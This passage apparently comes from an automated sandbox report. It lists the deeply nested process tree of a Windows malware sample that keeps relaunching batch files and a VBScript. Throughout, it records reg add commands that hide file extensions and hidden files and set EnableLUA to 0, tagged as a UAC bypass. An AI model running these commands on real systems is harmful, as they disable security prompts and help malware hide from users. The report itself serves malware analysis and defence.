C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fKkAsgYc.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
166⤵
PID:4988

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
167⤵
PID:3916

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
164⤵
- Modifies visibility of file extensions in Explorer
PID:1812

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
164⤵
PID:3672

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
164⤵
- UAC bypass
PID:1076

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
165⤵
PID:1968

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ryMYAQgM.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
164⤵
PID:3924

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
165⤵
PID:2212

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
162⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:1852

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
162⤵
PID:548

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
162⤵
- Modifies registry key
PID:3408

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmcoIoQE.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
162⤵
PID:5112

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
163⤵
PID:3972

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
160⤵
- Modifies visibility of file extensions in Explorer
PID:1296

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
161⤵
PID:736

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
160⤵
PID:1544

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
160⤵
PID:2296

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OCoQUswE.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
160⤵
PID:4232

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
161⤵
PID:1124

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
158⤵
- Modifies visibility of file extensions in Explorer
PID:3828

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
158⤵
- Modifies registry key
PID:4496

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
158⤵
- UAC bypass
PID:1060

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UCUEgogQ.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
158⤵
PID:2648

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
159⤵
PID:4860

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
156⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:2168

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
157⤵
PID:3424

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
156⤵
PID:3856

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
157⤵
PID:1448

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
156⤵
- UAC bypass
PID:744

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
157⤵
PID:2592

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gywYAckU.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
156⤵
PID:1556

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
157⤵
PID:4552

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
154⤵
- Modifies visibility of file extensions in Explorer
PID:2800

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
155⤵
PID:3076

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
154⤵
PID:4560

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
154⤵
- UAC bypass
- Modifies registry key
PID:3984

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zyYoEUQg.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
154⤵
PID:408

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
155⤵
PID:616

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
155⤵
PID:2224

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
152⤵
- Modifies registry key
PID:3604

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
153⤵
PID:4128

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
152⤵
PID:1896

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
153⤵
PID:1076

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
152⤵
- UAC bypass
PID:4752

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LaIMEIgM.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
152⤵
PID:4976

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
153⤵
PID:1296

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
150⤵
PID:2736

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
151⤵
PID:4840

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
150⤵
PID:4592

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
150⤵
PID:3172

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jCQAwAcg.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
150⤵
PID:396

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
151⤵
PID:2648

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
148⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:1656

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
148⤵
PID:368

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
148⤵
- UAC bypass
PID:3112

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
149⤵
PID:876

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zIwIoYog.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
148⤵
PID:4300

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
149⤵
PID:644

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
146⤵
PID:1396

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
146⤵
PID:4852

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
146⤵
- UAC bypass
PID:2068

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ikQUcgAw.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
146⤵
PID:1928

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
147⤵
PID:2460

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
144⤵
- Modifies visibility of file extensions in Explorer
PID:1920

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
145⤵
PID:816

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
144⤵
- Modifies registry key
PID:3400

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
144⤵
PID:4884

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ekIcMUQc.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
144⤵
PID:3224

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
145⤵
PID:4752

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
142⤵
- Modifies visibility of file extensions in Explorer
PID:4856

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
143⤵
PID:2056

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
142⤵
PID:3908

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
142⤵
- UAC bypass
PID:1440

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iEEksQQQ.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
142⤵
PID:4524

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
143⤵
PID:2100

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
140⤵
- Modifies visibility of file extensions in Explorer
PID:4532

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
140⤵
- Modifies registry key
PID:1800

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
140⤵
- UAC bypass
- Modifies registry key
PID:404

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iUEcsoIY.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
140⤵
PID:736

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
141⤵
PID:4060

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
138⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:1652

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
138⤵
PID:4860

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
138⤵
- UAC bypass
PID:2592

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ngckcgUg.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
138⤵
PID:1028

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
139⤵
PID:2156

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
136⤵
- Modifies visibility of file extensions in Explorer
PID:1832

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
136⤵
PID:1200

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
136⤵
- UAC bypass
PID:4132

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\neUYwAgg.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
136⤵
PID:4592

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
137⤵
PID:440

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
134⤵
- Modifies visibility of file extensions in Explorer
PID:404

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
134⤵
PID:1928

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
134⤵
- UAC bypass
PID:3716

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DQYEYcQI.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
134⤵
PID:3984

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
135⤵
PID:540

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
132⤵
PID:3400

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
132⤵
PID:4656

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
132⤵
PID:4776

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RUYQkQgs.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
132⤵
PID:3540

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
133⤵
PID:900

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
130⤵
PID:3908

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
130⤵
PID:1988

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
130⤵
PID:5036

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GgcAUcAU.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
130⤵
PID:4492

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
131⤵
PID:3436

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
128⤵
PID:3048

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
129⤵
PID:760

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
128⤵
PID:884

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
129⤵
PID:1396

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
128⤵
PID:2620

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ywoYksYk.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
128⤵
PID:4060

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
129⤵
PID:2000

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
126⤵
- Modifies visibility of file extensions in Explorer
PID:4896

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
127⤵
PID:452

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
126⤵
PID:3540

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
127⤵
PID:1348

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
126⤵
- UAC bypass
PID:3992

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WcQwsAgo.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
126⤵
PID:4788

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
127⤵
PID:3104

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
124⤵
PID:3908

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
124⤵
PID:1164

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
125⤵
PID:2544

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
124⤵
PID:4452

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MkUMsEUk.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
124⤵
PID:4848

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
125⤵
PID:2116

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
122⤵
PID:4688

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
122⤵
PID:4348

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
122⤵
- UAC bypass
PID:4940

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
123⤵
PID:1060

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TOQgAEIE.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
122⤵
PID:3924

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
123⤵
PID:2380

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
123⤵
PID:2796

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
120⤵
PID:644

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
121⤵
PID:3756

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
120⤵
PID:2792

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
121⤵
PID:2404

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
120⤵
- UAC bypass
PID:1328

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
121⤵
PID:544

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PwkoQMMQ.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
120⤵
PID:3300

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
121⤵
PID:4952

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
118⤵
- Modifies visibility of file extensions in Explorer
PID:4516

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
119⤵
PID:1872

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
118⤵
PID:4996

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
119⤵
PID:5096

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
118⤵
PID:2944

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hKEwAosI.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
118⤵
PID:3624

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
119⤵
PID:348

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
116⤵
PID:4268

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
116⤵
PID:3520

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
117⤵
PID:4400

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
116⤵
- UAC bypass
PID:3532

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
117⤵
PID:4752

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xgAMEUQM.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
116⤵
PID:968

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
117⤵
PID:4508

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
114⤵
PID:1928

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
115⤵
PID:4656

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
114⤵
PID:4960

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
115⤵
PID:1124

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
114⤵
- UAC bypass
PID:3540

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BWkYAoco.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
114⤵
PID:3716

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
115⤵
PID:900

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
112⤵
- Modifies visibility of file extensions in Explorer
PID:1832

C:\Windows\SysWOW64\reg.exe
